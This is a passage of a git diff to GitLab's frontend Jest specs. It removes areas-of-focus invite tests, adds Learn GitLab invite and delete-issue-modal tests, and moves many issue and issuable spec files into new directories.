const createComponent = (data = {}, props = {}) => { isProject, inviteeType, accessLevels, - areasOfFocusOptions, defaultAccessLevel, - noSelectionAreasOfFocus, tasksToBeDoneOptions, projects, helpLink, @@ -163,7 +154,6 @@ describe('InviteMembersModal', () => { const membersFormGroupInvalidFeedback = () => findMembersFormGroup().props('invalidFeedback'); const membersFormGroupDescription = () => findMembersFormGroup().props('description'); const findMembersSelect = () => wrapper.findComponent(MembersTokenSelect); - const findAreaofFocusCheckBoxGroup = () => wrapper.findComponent(GlFormCheckboxGroup); const findTasksToBeDone = () => wrapper.findByTestId('invite-members-modal-tasks-to-be-done'); const findTasks = () => wrapper.findByTestId('invite-members-modal-tasks'); const findProjectSelect = () => wrapper.findByTestId('invite-members-modal-project-select'); @@ -214,21 +204,6 @@ describe('InviteMembersModal', () => { }); }); - describe('rendering the areas_of_focus', () => { - it('renders the areas_of_focus checkboxes', () => { - createComponent(); - - expect(findAreaofFocusCheckBoxGroup().props('options')).toBe(areasOfFocusOptions); - expect(findAreaofFocusCheckBoxGroup().exists()).toBe(true); - }); - - it('does not render the areas_of_focus checkboxes', () => { - createComponent({}, { areasOfFocusOptions: [] }); - - expect(findAreaofFocusCheckBoxGroup().exists()).toBe(false); - }); - }); - describe('rendering the tasks to be done', () => { const setupComponent = ( extraData = {}, @@ -268,6 +243,14 @@ describe('InviteMembersModal', () => { expect(findTasksToBeDone().exists()).toBe(false); }); + + describe('when opened from the Learn GitLab page', () => { + it('does render the tasks to be done', () => { + setupComponent({ source: LEARN_GITLAB }, {}, []); + + expect(findTasksToBeDone().exists()).toBe(true); + }); + }); }); describe('rendering the tasks', () => { @@ -433,20 +416,6 @@ describe('InviteMembersModal', () => { "The member's email address is not allowed 
for this project. Go to the Admin area > Sign-up restrictions, and check Allowed domains for sign-ups."; const expectedSyntaxError = 'email contains an invalid email address'; - it('calls the API with the expected focus data when an areas_of_focus checkbox is clicked', () => { - const spy = jest.spyOn(Api, 'addGroupMembersByUserId'); - const expectedFocus = [areasOfFocusOptions[0].value]; - createComponent({ newUsersToInvite: [user1] }); - - findAreaofFocusCheckBoxGroup().vm.$emit('input', expectedFocus); - clickInviteButton(); - - expect(spy).toHaveBeenCalledWith( - user1.id.toString(), - expect.objectContaining({ areas_of_focus: expectedFocus }), - ); - }); - describe('when inviting an existing user to group by user ID', () => { const postData = { user_id: '1,2', @@ -454,7 +423,6 @@ describe('InviteMembersModal', () => { expires_at: undefined, invite_source: inviteSource, format: 'json', - areas_of_focus: noSelectionAreasOfFocus, tasks_to_be_done: [], tasks_project_id: '', }; @@ -465,17 +433,6 @@ describe('InviteMembersModal', () => { wrapper.vm.$toast = { show: jest.fn() }; jest.spyOn(Api, 'addGroupMembersByUserId').mockResolvedValue({ data: postData }); - jest.spyOn(wrapper.vm, 'showToastMessageSuccess'); - }); - - it('includes the non-default selected areas of focus', () => { - const focus = ['abc']; - const updatedPostData = { ...postData, areas_of_focus: focus }; - wrapper.setData({ selectedAreasOfFocus: focus }); - - clickInviteButton(); - - expect(Api.addGroupMembersByUserId).toHaveBeenCalledWith(id, updatedPostData); }); describe('when triggered from regular mounting', () => { @@ -492,7 +449,23 @@ describe('InviteMembersModal', () => { }); it('displays the successful toastMessage', () => { - expect(wrapper.vm.showToastMessageSuccess).toHaveBeenCalled(); + expect(wrapper.vm.$toast.show).toHaveBeenCalledWith('Members were successfully added', { + onComplete: expect.any(Function), + }); + }); + }); + + describe('when opened from a Learn GitLab page', () => { 
+ it('emits the `showSuccessfulInvitationsAlert` event', async () => { + eventHub.$emit('openModal', { inviteeType: 'members', source: LEARN_GITLAB }); + + jest.spyOn(eventHub, '$emit').mockImplementation(); + + clickInviteButton(); + + await waitForPromises(); + + expect(eventHub.$emit).toHaveBeenCalledWith('showSuccessfulInvitationsAlert'); }); }); }); @@ -637,7 +610,6 @@ describe('InviteMembersModal', () => { expires_at: undefined, email: 'email@example.com', invite_source: inviteSource, - areas_of_focus: noSelectionAreasOfFocus, tasks_to_be_done: [], tasks_project_id: '', format: 'json', @@ -649,17 +621,6 @@ describe('InviteMembersModal', () => { wrapper.vm.$toast = { show: jest.fn() }; jest.spyOn(Api, 'inviteGroupMembersByEmail').mockResolvedValue({ data: postData }); - jest.spyOn(wrapper.vm, 'showToastMessageSuccess'); - }); - - it('includes the non-default selected areas of focus', () => { - const focus = ['abc']; - const updatedPostData = { ...postData, areas_of_focus: focus }; - wrapper.setData({ selectedAreasOfFocus: focus }); - - clickInviteButton(); - - expect(Api.inviteGroupMembersByEmail).toHaveBeenCalledWith(id, updatedPostData); }); describe('when triggered from regular mounting', () => { @@ -672,7 +633,9 @@ describe('InviteMembersModal', () => { }); it('displays the successful toastMessage', () => { - expect(wrapper.vm.showToastMessageSuccess).toHaveBeenCalled(); + expect(wrapper.vm.$toast.show).toHaveBeenCalledWith('Members were successfully added', { + onComplete: expect.any(Function), + }); }); }); }); @@ -711,13 +674,14 @@ describe('InviteMembersModal', () => { it('displays the successful toast message when email has already been invited', async () => { mockInvitationsApi(httpStatus.CREATED, invitationsApiResponse.EMAIL_TAKEN); wrapper.vm.$toast = { show: jest.fn() }; - jest.spyOn(wrapper.vm, 'showToastMessageSuccess'); clickInviteButton(); await waitForPromises(); - expect(wrapper.vm.showToastMessageSuccess).toHaveBeenCalled(); + 
expect(wrapper.vm.$toast.show).toHaveBeenCalledWith('Members were successfully added', { + onComplete: expect.any(Function), + }); expect(findMembersSelect().props('validationState')).toBe(null); }); @@ -766,7 +730,6 @@ describe('InviteMembersModal', () => { access_level: defaultAccessLevel, expires_at: undefined, invite_source: inviteSource, - areas_of_focus: noSelectionAreasOfFocus, format: 'json', tasks_to_be_done: [], tasks_project_id: '', @@ -782,8 +745,6 @@ describe('InviteMembersModal', () => { wrapper.vm.$toast = { show: jest.fn() }; jest.spyOn(Api, 'inviteGroupMembersByEmail').mockResolvedValue({ data: postData }); jest.spyOn(Api, 'addGroupMembersByUserId').mockResolvedValue({ data: postData }); - jest.spyOn(wrapper.vm, 'showToastMessageSuccess'); - jest.spyOn(wrapper.vm, 'trackInvite'); }); describe('when triggered from regular mounting', () => { @@ -800,7 +761,9 @@ describe('InviteMembersModal', () => { }); it('displays the successful toastMessage', () => { - expect(wrapper.vm.showToastMessageSuccess).toHaveBeenCalled(); + expect(wrapper.vm.$toast.show).toHaveBeenCalledWith('Members were successfully added', { + onComplete: expect.any(Function), + }); }); }); @@ -855,7 +818,6 @@ describe('InviteMembersModal', () => { wrapper.setData({ inviteeType: 'group' }); wrapper.vm.$toast = { show: jest.fn() }; jest.spyOn(Api, 'groupShareWithGroup').mockResolvedValue({ data: groupPostData }); - jest.spyOn(wrapper.vm, 'showToastMessageSuccess'); clickInviteButton(); }); @@ -865,7 +827,9 @@ describe('InviteMembersModal', () => { }); it('displays the successful toastMessage', () => { - expect(wrapper.vm.showToastMessageSuccess).toHaveBeenCalled(); + expect(wrapper.vm.$toast.show).toHaveBeenCalledWith('Members were successfully added', { + onComplete: expect.any(Function), + }); }); }); @@ -898,47 +862,11 @@ describe('InviteMembersModal', () => { jest.spyOn(Api, 'inviteGroupMembersByEmail').mockResolvedValue({}); }); - it('tracks the invite', () => { - 
eventHub.$emit('openModal', { inviteeType: 'members', source: INVITE_MEMBERS_IN_COMMENT }); - - clickInviteButton(); - - expect(ExperimentTracking).toHaveBeenCalledWith(INVITE_MEMBERS_IN_COMMENT); - expect(ExperimentTracking.prototype.event).toHaveBeenCalledWith('comment_invite_success'); - }); - - it('does not track invite for unknown source', () => { - eventHub.$emit('openModal', { inviteeType: 'members', source: 'unknown' }); - - clickInviteButton(); - - expect(ExperimentTracking).not.toHaveBeenCalledWith(INVITE_MEMBERS_IN_COMMENT); - }); - - it('does not track invite undefined source', () => { - eventHub.$emit('openModal', { inviteeType: 'members' }); - - clickInviteButton(); - - expect(ExperimentTracking).not.toHaveBeenCalledWith(INVITE_MEMBERS_IN_COMMENT); - }); - - it('tracks the view for areas_of_focus', () => { - eventHub.$emit('openModal', { inviteeType: 'members' }); + it('tracks the view for learn_gitlab source', () => { + eventHub.$emit('openModal', { inviteeType: 'members', source: LEARN_GITLAB }); - expect(ExperimentTracking).toHaveBeenCalledWith(MEMBER_AREAS_OF_FOCUS.name); - expect(ExperimentTracking.prototype.event).toHaveBeenCalledWith(MEMBER_AREAS_OF_FOCUS.view); - }); - - it('tracks the invite for areas_of_focus', () => { - eventHub.$emit('openModal', { inviteeType: 'members' }); - - clickInviteButton(); - - expect(ExperimentTracking).toHaveBeenCalledWith(MEMBER_AREAS_OF_FOCUS.name); - expect(ExperimentTracking.prototype.event).toHaveBeenCalledWith( - MEMBER_AREAS_OF_FOCUS.submit, - ); + expect(ExperimentTracking).toHaveBeenCalledWith(INVITE_MEMBERS_FOR_TASK.name); + expect(ExperimentTracking.prototype.event).toHaveBeenCalledWith(LEARN_GITLAB); }); }); }); diff --git a/spec/frontend/invite_members/components/invite_members_trigger_spec.js b/spec/frontend/invite_members/components/invite_members_trigger_spec.js index 3fce23f854c..429b6fad24a 100644 --- a/spec/frontend/invite_members/components/invite_members_trigger_spec.js +++ 
b/spec/frontend/invite_members/components/invite_members_trigger_spec.js @@ -1,6 +1,5 @@ import { GlButton, GlLink, GlIcon } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import ExperimentTracking from '~/experimentation/experiment_tracking'; import InviteMembersTrigger from '~/invite_members/components/invite_members_trigger.vue'; import eventHub from '~/invite_members/event_hub'; import { TRIGGER_ELEMENT_BUTTON, TRIGGER_ELEMENT_SIDE_NAV } from '~/invite_members/constants'; @@ -79,19 +78,6 @@ describe.each(triggerItems)('with triggerElement as %s', (triggerItem) => { }); describe('tracking', () => { - it('tracks on mounting', () => { - createComponent({ trackExperiment: '_track_experiment_' }); - - expect(ExperimentTracking).toHaveBeenCalledWith('_track_experiment_'); - expect(ExperimentTracking.prototype.event).toHaveBeenCalledWith('comment_invite_shown'); - }); - - it('does not track on mounting', () => { - createComponent(); - - expect(ExperimentTracking).not.toHaveBeenCalledWith('_track_experiment_'); - }); - it('does not add tracking attributes', () => { createComponent(); diff --git a/spec/frontend/issuable_bulk_update_sidebar/components/status_select_spec.js b/spec/frontend/issuable/bulk_update_sidebar/components/status_select_spec.js index 09dcb963154..8ecbf41ce56 100644 --- a/spec/frontend/issuable_bulk_update_sidebar/components/status_select_spec.js +++ b/spec/frontend/issuable/bulk_update_sidebar/components/status_select_spec.js @@ -1,7 +1,7 @@ import { GlDropdown, GlDropdownItem } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import StatusSelect from '~/issuable_bulk_update_sidebar/components/status_select.vue'; -import { ISSUE_STATUS_SELECT_OPTIONS } from '~/issuable_bulk_update_sidebar/constants'; +import StatusSelect from '~/issuable/bulk_update_sidebar/components/status_select.vue'; +import { ISSUE_STATUS_SELECT_OPTIONS } from '~/issuable/bulk_update_sidebar/constants'; describe('StatusSelect', () => { 
let wrapper; diff --git a/spec/frontend/vue_shared/components/issuable/issuable_header_warnings_spec.js b/spec/frontend/issuable/components/issuable_header_warnings_spec.js index ad8331afcff..c8380e42787 100644 --- a/spec/frontend/vue_shared/components/issuable/issuable_header_warnings_spec.js +++ b/spec/frontend/issuable/components/issuable_header_warnings_spec.js @@ -1,16 +1,15 @@ -import { createLocalVue } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import { createStore as createMrStore } from '~/mr_notes/stores'; import createIssueStore from '~/notes/stores'; -import IssuableHeaderWarnings from '~/vue_shared/components/issuable/issuable_header_warnings.vue'; +import IssuableHeaderWarnings from '~/issuable/components/issuable_header_warnings.vue'; const ISSUABLE_TYPE_ISSUE = 'issue'; const ISSUABLE_TYPE_MR = 'merge request'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); describe('IssuableHeaderWarnings', () => { let wrapper; @@ -24,7 +23,6 @@ describe('IssuableHeaderWarnings', () => { const createComponent = ({ store, provide }) => { wrapper = shallowMountExtended(IssuableHeaderWarnings, { store, - localVue, provide, directives: { GlTooltip: createMockDirective(), diff --git a/spec/frontend/vue_shared/components/issue/issue_assignees_spec.js b/spec/frontend/issuable/components/issue_assignees_spec.js index f74b9b37197..713c8b1dfdd 100644 --- a/spec/frontend/vue_shared/components/issue/issue_assignees_spec.js +++ b/spec/frontend/issuable/components/issue_assignees_spec.js @@ -1,6 +1,6 @@ import { shallowMount } from '@vue/test-utils'; import { mockAssigneesList } from 'jest/boards/mock_data'; -import IssueAssignees from '~/vue_shared/components/issue/issue_assignees.vue'; +import IssueAssignees from '~/issuable/components/issue_assignees.vue'; import 
UserAvatarLink from '~/vue_shared/components/user_avatar/user_avatar_link.vue'; const TEST_CSS_CLASSES = 'test-classes'; diff --git a/spec/frontend/vue_shared/components/issue/issue_milestone_spec.js b/spec/frontend/issuable/components/issue_milestone_spec.js index 9a121050225..44416676180 100644 --- a/spec/frontend/vue_shared/components/issue/issue_milestone_spec.js +++ b/spec/frontend/issuable/components/issue_milestone_spec.js @@ -3,7 +3,7 @@ import { shallowMount } from '@vue/test-utils'; import Vue from 'vue'; import { mockMilestone } from 'jest/boards/mock_data'; -import IssueMilestone from '~/vue_shared/components/issue/issue_milestone.vue'; +import IssueMilestone from '~/issuable/components/issue_milestone.vue'; const createComponent = (milestone = mockMilestone) => { const Component = Vue.extend(IssueMilestone); diff --git a/spec/frontend/vue_shared/components/issue/related_issuable_item_spec.js b/spec/frontend/issuable/components/related_issuable_item_spec.js index 6ab828efebe..6ac4c9e8546 100644 --- a/spec/frontend/vue_shared/components/issue/related_issuable_item_spec.js +++ b/spec/frontend/issuable/components/related_issuable_item_spec.js @@ -2,7 +2,7 @@ import { mount } from '@vue/test-utils'; import { TEST_HOST } from 'helpers/test_constants'; import IssueDueDate from '~/boards/components/issue_due_date.vue'; import { formatDate } from '~/lib/utils/datetime_utility'; -import RelatedIssuableItem from '~/vue_shared/components/issue/related_issuable_item.vue'; +import RelatedIssuableItem from '~/issuable/components/related_issuable_item.vue'; import { defaultAssignees, defaultMilestone } from './related_issuable_mock_data'; describe('RelatedIssuableItem', () => { diff --git a/spec/frontend/vue_shared/components/issue/related_issuable_mock_data.js b/spec/frontend/issuable/components/related_issuable_mock_data.js index 6cdb945ec20..6cdb945ec20 100644 --- a/spec/frontend/vue_shared/components/issue/related_issuable_mock_data.js +++ 
b/spec/frontend/issuable/components/related_issuable_mock_data.js diff --git a/spec/frontend/issuable_form_spec.js b/spec/frontend/issuable/issuable_form_spec.js index c77fde4261e..321c61ead1e 100644 --- a/spec/frontend/issuable_form_spec.js +++ b/spec/frontend/issuable/issuable_form_spec.js @@ -1,6 +1,6 @@ import $ from 'jquery'; -import IssuableForm from '~/issuable_form'; +import IssuableForm from '~/issuable/issuable_form'; function createIssuable() { const instance = new IssuableForm($(document.createElement('form'))); diff --git a/spec/frontend/issuable/related_issues/components/related_issues_block_spec.js b/spec/frontend/issuable/related_issues/components/related_issues_block_spec.js index a450f912c4e..608fec45bbd 100644 --- a/spec/frontend/issuable/related_issues/components/related_issues_block_spec.js +++ b/spec/frontend/issuable/related_issues/components/related_issues_block_spec.js @@ -4,7 +4,7 @@ import { issuable1, issuable2, issuable3, -} from 'jest/vue_shared/components/issue/related_issuable_mock_data'; +} from 'jest/issuable/components/related_issuable_mock_data'; import RelatedIssuesBlock from '~/related_issues/components/related_issues_block.vue'; import { linkedIssueTypesMap, diff --git a/spec/frontend/issuable/related_issues/components/related_issues_list_spec.js b/spec/frontend/issuable/related_issues/components/related_issues_list_spec.js index ffd9683cd6b..c7df3755e88 100644 --- a/spec/frontend/issuable/related_issues/components/related_issues_list_spec.js +++ b/spec/frontend/issuable/related_issues/components/related_issues_list_spec.js @@ -5,7 +5,7 @@ import { issuable3, issuable4, issuable5, -} from 'jest/vue_shared/components/issue/related_issuable_mock_data'; +} from 'jest/issuable/components/related_issuable_mock_data'; import IssueDueDate from '~/boards/components/issue_due_date.vue'; import RelatedIssuesList from '~/related_issues/components/related_issues_list.vue'; import { PathIdSeparator } from '~/related_issues/constants'; diff 
--git a/spec/frontend/issuable/related_issues/components/related_issues_root_spec.js b/spec/frontend/issuable/related_issues/components/related_issues_root_spec.js index 3099e0b639b..01de4da7900 100644 --- a/spec/frontend/issuable/related_issues/components/related_issues_root_spec.js +++ b/spec/frontend/issuable/related_issues/components/related_issues_root_spec.js @@ -5,7 +5,7 @@ import { defaultProps, issuable1, issuable2, -} from 'jest/vue_shared/components/issue/related_issuable_mock_data'; +} from 'jest/issuable/components/related_issuable_mock_data'; import createFlash from '~/flash'; import axios from '~/lib/utils/axios_utils'; import RelatedIssuesRoot from '~/related_issues/components/related_issues_root.vue'; diff --git a/spec/frontend/issuable/related_issues/stores/related_issues_store_spec.js b/spec/frontend/issuable/related_issues/stores/related_issues_store_spec.js index ada1c44560f..4a6bd832fba 100644 --- a/spec/frontend/issuable/related_issues/stores/related_issues_store_spec.js +++ b/spec/frontend/issuable/related_issues/stores/related_issues_store_spec.js @@ -4,7 +4,7 @@ import { issuable3, issuable4, issuable5, -} from 'jest/vue_shared/components/issue/related_issuable_mock_data'; +} from 'jest/issuable/components/related_issuable_mock_data'; import RelatedIssuesStore from '~/related_issues/stores/related_issues_store'; describe('RelatedIssuesStore', () => { diff --git a/spec/frontend/issuable_spec.js b/spec/frontend/issuable_spec.js deleted file mode 100644 index e0bd7b802c9..00000000000 --- a/spec/frontend/issuable_spec.js +++ /dev/null @@ -1,22 +0,0 @@ -import issuableInitBulkUpdateSidebar from '~/issuable_bulk_update_sidebar/issuable_init_bulk_update_sidebar'; -import IssuableIndex from '~/issuable_index'; - -describe('Issuable', () => { - describe('initBulkUpdate', () => { - it('should not set bulkUpdateSidebar', () => { - new IssuableIndex('issue_'); // eslint-disable-line no-new - - 
expect(issuableInitBulkUpdateSidebar.bulkUpdateSidebar).toBeNull(); - }); - - it('should set bulkUpdateSidebar', () => { - const element = document.createElement('div'); - element.classList.add('issues-bulk-update'); - document.body.appendChild(element); - - new IssuableIndex('issue_'); // eslint-disable-line no-new - - expect(issuableInitBulkUpdateSidebar.bulkUpdateSidebar).toBeDefined(); - }); - }); -}); diff --git a/spec/frontend/issue_spec.js b/spec/frontend/issues/issue_spec.js index 952ef54d286..8a089b372ff 100644 --- a/spec/frontend/issue_spec.js +++ b/spec/frontend/issues/issue_spec.js @@ -1,7 +1,7 @@ import { getByText } from '@testing-library/dom'; import MockAdapter from 'axios-mock-adapter'; import { EVENT_ISSUABLE_VUE_APP_CHANGE } from '~/issuable/constants'; -import Issue from '~/issue'; +import Issue from '~/issues/issue'; import axios from '~/lib/utils/axios_utils'; describe('Issue', () => { diff --git a/spec/frontend/issuable_type_selector/components/__snapshots__/info_popover_spec.js.snap b/spec/frontend/issues/new/components/__snapshots__/type_popover_spec.js.snap index 196fbb8a643..881dcda126f 100644 --- a/spec/frontend/issuable_type_selector/components/__snapshots__/info_popover_spec.js.snap +++ b/spec/frontend/issues/new/components/__snapshots__/type_popover_spec.js.snap @@ -1,12 +1,12 @@ // Jest Snapshot v1, https://goo.gl/fbAQLP -exports[`Issuable type info popover renders 1`] = ` +exports[`Issue type info popover renders 1`] = ` <span id="popovercontainer" > <gl-icon-stub class="gl-ml-5 gl-text-gray-500" - id="issuable-type-info" + id="issue-type-info" name="question-o" size="16" /> @@ -14,7 +14,7 @@ exports[`Issuable type info popover renders 1`] = ` <gl-popover-stub container="popovercontainer" cssclasses="" - target="issuable-type-info" + target="issue-type-info" title="Issue types" triggers="focus hover" > diff --git a/spec/frontend/issuable_suggestions/components/item_spec.js 
b/spec/frontend/issues/new/components/title_suggestions_item_spec.js index 45f96103e3e..5eb30b52de5 100644 --- a/spec/frontend/issuable_suggestions/components/item_spec.js +++ b/spec/frontend/issues/new/components/title_suggestions_item_spec.js @@ -1,15 +1,15 @@ import { GlTooltip, GlLink, GlIcon } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import { TEST_HOST } from 'helpers/test_constants'; -import Suggestion from '~/issuable_suggestions/components/item.vue'; +import TitleSuggestionsItem from '~/issues/new/components/title_suggestions_item.vue'; import UserAvatarImage from '~/vue_shared/components/user_avatar/user_avatar_image.vue'; import mockData from '../mock_data'; -describe('Issuable suggestions suggestion component', () => { +describe('Issue title suggestions item component', () => { let wrapper; function createComponent(suggestion = {}) { - wrapper = shallowMount(Suggestion, { + wrapper = shallowMount(TitleSuggestionsItem, { propsData: { suggestion: { ...mockData(), diff --git a/spec/frontend/issuable_suggestions/components/app_spec.js b/spec/frontend/issues/new/components/title_suggestions_spec.js index fb8ef00567c..984d0c9d25b 100644 --- a/spec/frontend/issuable_suggestions/components/app_spec.js +++ b/spec/frontend/issues/new/components/title_suggestions_spec.js @@ -1,12 +1,12 @@ import { shallowMount } from '@vue/test-utils'; -import App from '~/issuable_suggestions/components/app.vue'; -import Suggestion from '~/issuable_suggestions/components/item.vue'; +import TitleSuggestions from '~/issues/new/components/title_suggestions.vue'; +import TitleSuggestionsItem from '~/issues/new/components/title_suggestions_item.vue'; -describe('Issuable suggestions app component', () => { +describe('Issue title suggestions component', () => { let wrapper; function createComponent(search = 'search') { - wrapper = shallowMount(App, { + wrapper = shallowMount(TitleSuggestions, { propsData: { search, projectPath: 'project', @@ -77,7 +77,7 @@ 
describe('Issuable suggestions app component', () => { wrapper.setData(data); return wrapper.vm.$nextTick(() => { - expect(wrapper.findAll(Suggestion).length).toBe(2); + expect(wrapper.findAll(TitleSuggestionsItem).length).toBe(2); }); }); diff --git a/spec/frontend/issuable_type_selector/components/info_popover_spec.js b/spec/frontend/issues/new/components/type_popover_spec.js index 975977ffeb3..fe3d5207516 100644 --- a/spec/frontend/issuable_type_selector/components/info_popover_spec.js +++ b/spec/frontend/issues/new/components/type_popover_spec.js @@ -1,11 +1,11 @@ import { shallowMount } from '@vue/test-utils'; -import InfoPopover from '~/issuable_type_selector/components/info_popover.vue'; +import TypePopover from '~/issues/new/components/type_popover.vue'; -describe('Issuable type info popover', () => { +describe('Issue type info popover', () => { let wrapper; function createComponent() { - wrapper = shallowMount(InfoPopover); + wrapper = shallowMount(TypePopover); } afterEach(() => { diff --git a/spec/frontend/issuable_suggestions/mock_data.js b/spec/frontend/issues/new/mock_data.js index 74b569d9833..74b569d9833 100644 --- a/spec/frontend/issuable_suggestions/mock_data.js +++ b/spec/frontend/issues/new/mock_data.js diff --git a/spec/frontend/related_merge_requests/components/related_merge_requests_spec.js b/spec/frontend/issues/related_merge_requests/components/related_merge_requests_spec.js index 486fb699275..4d780a674be 100644 --- a/spec/frontend/related_merge_requests/components/related_merge_requests_spec.js +++ b/spec/frontend/issues/related_merge_requests/components/related_merge_requests_spec.js @@ -2,9 +2,9 @@ import { mount, createLocalVue } from '@vue/test-utils'; import MockAdapter from 'axios-mock-adapter'; import mockData from 'test_fixtures/issues/related_merge_requests.json'; import axios from '~/lib/utils/axios_utils'; -import RelatedMergeRequests from '~/related_merge_requests/components/related_merge_requests.vue'; -import createStore from 
'~/related_merge_requests/store/index'; -import RelatedIssuableItem from '~/vue_shared/components/issue/related_issuable_item.vue'; +import RelatedMergeRequests from '~/issues/related_merge_requests/components/related_merge_requests.vue'; +import createStore from '~/issues/related_merge_requests/store/index'; +import RelatedIssuableItem from '~/issuable/components/related_issuable_item.vue'; const API_ENDPOINT = '/api/v4/projects/2/issues/33/related_merge_requests'; const localVue = createLocalVue(); diff --git a/spec/frontend/related_merge_requests/store/actions_spec.js b/spec/frontend/issues/related_merge_requests/store/actions_spec.js index 3bd07c34b6f..5f232fee09b 100644 --- a/spec/frontend/related_merge_requests/store/actions_spec.js +++ b/spec/frontend/issues/related_merge_requests/store/actions_spec.js @@ -2,8 +2,8 @@ import MockAdapter from 'axios-mock-adapter'; import testAction from 'helpers/vuex_action_helper'; import createFlash from '~/flash'; import axios from '~/lib/utils/axios_utils'; -import * as actions from '~/related_merge_requests/store/actions'; -import * as types from '~/related_merge_requests/store/mutation_types'; +import * as actions from '~/issues/related_merge_requests/store/actions'; +import * as types from '~/issues/related_merge_requests/store/mutation_types'; jest.mock('~/flash'); diff --git a/spec/frontend/related_merge_requests/store/mutations_spec.js b/spec/frontend/issues/related_merge_requests/store/mutations_spec.js index 436c7dca6ce..0e3d26b3879 100644 --- a/spec/frontend/related_merge_requests/store/mutations_spec.js +++ b/spec/frontend/issues/related_merge_requests/store/mutations_spec.js @@ -1,5 +1,5 @@ -import * as types from '~/related_merge_requests/store/mutation_types'; -import mutations from '~/related_merge_requests/store/mutations'; +import * as types from '~/issues/related_merge_requests/store/mutation_types'; +import mutations from '~/issues/related_merge_requests/store/mutations'; describe('RelatedMergeRequests 
Store Mutations', () => { describe('SET_INITIAL_STATE', () => { diff --git a/spec/frontend/sentry_error_stack_trace/components/sentry_error_stack_trace_spec.js b/spec/frontend/issues/sentry_error_stack_trace/components/sentry_error_stack_trace_spec.js index 772d6903052..5a51ae3cfe0 100644 --- a/spec/frontend/sentry_error_stack_trace/components/sentry_error_stack_trace_spec.js +++ b/spec/frontend/issues/sentry_error_stack_trace/components/sentry_error_stack_trace_spec.js @@ -2,7 +2,7 @@ import { GlLoadingIcon } from '@gitlab/ui'; import { createLocalVue, shallowMount } from '@vue/test-utils'; import Vuex from 'vuex'; import Stacktrace from '~/error_tracking/components/stacktrace.vue'; -import SentryErrorStackTrace from '~/sentry_error_stack_trace/components/sentry_error_stack_trace.vue'; +import SentryErrorStackTrace from '~/issues/sentry_error_stack_trace/components/sentry_error_stack_trace.vue'; const localVue = createLocalVue(); localVue.use(Vuex); diff --git a/spec/frontend/issue_show/components/app_spec.js b/spec/frontend/issues/show/components/app_spec.js index e32215b4aa6..02db82b84dc 100644 --- a/spec/frontend/issue_show/components/app_spec.js +++ b/spec/frontend/issues/show/components/app_spec.js @@ -4,12 +4,13 @@ import { nextTick } from 'vue'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import { mountExtended } from 'helpers/vue_test_utils_helper'; import '~/behaviors/markdown/render_gfm'; -import IssuableApp from '~/issue_show/components/app.vue'; -import DescriptionComponent from '~/issue_show/components/description.vue'; -import IncidentTabs from '~/issue_show/components/incidents/incident_tabs.vue'; -import PinnedLinks from '~/issue_show/components/pinned_links.vue'; -import { IssuableStatus, IssuableStatusText, POLLING_DELAY } from '~/issue_show/constants'; -import eventHub from '~/issue_show/event_hub'; +import { IssuableStatus, IssuableStatusText } from '~/issues/constants'; +import IssuableApp from 
'~/issues/show/components/app.vue'; +import DescriptionComponent from '~/issues/show/components/description.vue'; +import IncidentTabs from '~/issues/show/components/incidents/incident_tabs.vue'; +import PinnedLinks from '~/issues/show/components/pinned_links.vue'; +import { POLLING_DELAY } from '~/issues/show/constants'; +import eventHub from '~/issues/show/event_hub'; import axios from '~/lib/utils/axios_utils'; import { visitUrl } from '~/lib/utils/url_utility'; import { @@ -25,7 +26,7 @@ function formatText(text) { } jest.mock('~/lib/utils/url_utility'); -jest.mock('~/issue_show/event_hub'); +jest.mock('~/issues/show/event_hub'); const REALTIME_REQUEST_STACK = [initialRequest, secondRequest]; @@ -325,44 +326,6 @@ describe('Issuable output', () => { }); }); - describe('deleteIssuable', () => { - it('changes URL when deleted', () => { - jest.spyOn(wrapper.vm.service, 'deleteIssuable').mockResolvedValue({ - data: { - web_url: '/test', - }, - }); - - return wrapper.vm.deleteIssuable().then(() => { - expect(visitUrl).toHaveBeenCalledWith('/test'); - }); - }); - - it('stops polling when deleting', () => { - const spy = jest.spyOn(wrapper.vm.poll, 'stop'); - jest.spyOn(wrapper.vm.service, 'deleteIssuable').mockResolvedValue({ - data: { - web_url: '/test', - }, - }); - - return wrapper.vm.deleteIssuable().then(() => { - expect(spy).toHaveBeenCalledWith(); - }); - }); - - it('closes form on error', () => { - jest.spyOn(wrapper.vm.service, 'deleteIssuable').mockRejectedValue(); - - return wrapper.vm.deleteIssuable().then(() => { - expect(eventHub.$emit).not.toHaveBeenCalledWith('close.form'); - expect(document.querySelector('.flash-container .flash-text').innerText.trim()).toBe( - 'Error deleting issue', - ); - }); - }); - }); - describe('updateAndShowForm', () => { it('shows locked warning if form is open & data is different', () => { return wrapper.vm diff --git a/spec/frontend/issues/show/components/delete_issue_modal_spec.js 
b/spec/frontend/issues/show/components/delete_issue_modal_spec.js new file mode 100644 index 00000000000..97a091a1748 --- /dev/null +++ b/spec/frontend/issues/show/components/delete_issue_modal_spec.js @@ -0,0 +1,108 @@ +import { GlModal } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import DeleteIssueModal from '~/issues/show/components/delete_issue_modal.vue'; + +jest.mock('~/lib/utils/csrf', () => ({ token: 'mock-csrf-token' })); + +describe('DeleteIssueModal component', () => { + let wrapper; + + const defaultProps = { + issuePath: 'gitlab-org/gitlab-test/-/issues/1', + issueType: 'issue', + modalId: 'modal-id', + title: 'Delete issue', + }; + + const findForm = () => wrapper.find('form'); + const findModal = () => wrapper.findComponent(GlModal); + + const mountComponent = (props = {}) => + shallowMount(DeleteIssueModal, { propsData: { ...defaultProps, ...props } }); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('modal', () => { + it('renders', () => { + wrapper = mountComponent(); + + expect(findModal().props()).toMatchObject({ + actionCancel: DeleteIssueModal.actionCancel, + actionPrimary: { + attributes: { variant: 'danger' }, + text: defaultProps.title, + }, + modalId: defaultProps.modalId, + size: 'sm', + title: defaultProps.title, + }); + }); + + describe('when "primary" event is emitted', () => { + let formSubmitSpy; + + beforeEach(() => { + wrapper = mountComponent(); + formSubmitSpy = jest.spyOn(wrapper.vm.$refs.form, 'submit'); + 